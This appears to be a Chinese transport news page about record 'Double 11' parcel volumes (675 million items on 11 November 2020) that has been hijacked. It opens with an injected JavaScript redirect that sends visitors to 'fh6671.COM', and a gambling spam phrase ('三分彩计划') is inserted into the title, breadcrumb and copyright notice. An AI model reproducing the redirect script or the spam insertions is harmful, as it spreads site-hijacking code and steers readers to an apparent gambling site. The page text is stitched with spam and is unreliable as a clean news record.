function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 图片新闻

“双11”当天处理快件6.75亿件

2020-11-13 10:01:31 来源:中国交通新闻网 作者:​记者 阎语 文/图

11月11日,位于北京通州的苏宁物流基地紧张运转。

国家邮政局监测数据显示,11月1日至11日,全国邮政、快递企业共处理快件39.65亿件。11日当天共处理快件6.75亿件,同比增长26.16%,再创历史新高。

据了解,今年快递业务旺季范围为11月初至2021年春节(2月12日)前夕,其间各电商平台的系列促销活动将带动快递业务量显著增长。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。